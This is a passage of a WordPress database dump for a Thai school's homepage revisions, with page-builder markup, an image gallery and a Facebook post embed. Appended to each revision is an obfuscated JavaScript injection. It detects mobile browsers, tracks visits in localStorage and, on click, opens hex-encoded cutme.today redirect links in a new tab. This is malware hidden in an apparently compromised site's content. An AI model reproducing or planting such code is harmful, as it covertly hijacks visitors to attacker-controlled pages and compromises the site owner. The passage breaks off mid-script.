|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:35:38','2024-07-27 03:35:38','',14,'http://pakhaeng.ssk.in.th/?p=35',0,'revision','',0),
(36,1,'2024-07-27 10:35:46','2024-07-27 03:35:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:35:46','2024-07-27 03:35:46','',14,'http://pakhaeng.ssk.in.th/?p=36',0,'revision','',0),
(37,1,'2024-07-27 10:38:34','2024-07-27 03:38:34','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid0Pq8iceG2253xBP9jpBqVEcspyAZ9ngcyJ9AYWdkAkZyLyFfzVE4wn1gWAmjfuEBSl&show_text=true&width=500\" width=\"500\" height=\"722\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 